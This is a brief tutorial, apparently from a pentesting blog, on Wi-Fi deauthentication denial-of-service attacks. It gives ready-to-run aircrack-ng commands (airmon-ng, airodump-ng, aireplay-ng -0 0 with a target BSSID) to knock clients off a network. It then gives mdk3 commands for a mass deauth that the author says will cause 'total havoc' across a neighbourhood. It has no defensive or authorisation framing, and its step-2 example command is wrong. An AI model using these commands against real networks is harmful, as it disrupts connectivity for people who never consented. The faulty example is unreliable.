DEAUTH ATTACK

It is a Denial of service attack (DoS) targeted between router and the connectced clients. A crafted deauth packet is sent to router which results in termination of the connection between router and a client.

The below diagram depicts the theory

 

 

STEPS

The steps required to initiate a deauth consists of below steps:

  1. Initiate promiscous mode AKA monitor mode
  2. Scan for networks
  3. Select target network
  4. Launch the attack

 

1. INITIATE PROMISCOUS MODE

airmon-ng start <WIRELESS INTERFACE>

airmon-ng start wlp3s0

Make sure to check our previous tutorial on "Attacking WPS" if you are stuck in this step

 

2. SCAN FOR NETWORKS

airodump-ng <WIRELESS INTERFACE>

airmon-ng wlp3s0mon

 

3. SELECT TARGET NETWORK

From the airodump window select the target network and copy its BSSID (first column)

 

4. LAUNCH THE ATTACK

aireplay-ng -0 0 -a <BSSID> <MONITOR INTERFACE>

aireplay-ng -0 0 -a 30:b5:c2:dd:ee:ff wlp3s0mon

 

 

 

This tactic is for a single wifi network, in order to perform a mass deauth attack in a neighbourhood, attackers use a more sophisticated tool called as mdk3 which is builtin Kali and other pentesting distros. Beware this will cause total havoc in your neighbourhood due to unavailability of Wifi.

SYNTAX

# mdk3 <INTERFACE> d

mdk3 wlp3s0mon d

In order to fix it to a particular channel

# mdk3 <INTERFACE> d -c <CHANNEL NUMBER>

mdk3 wlp3s0mon d -c 2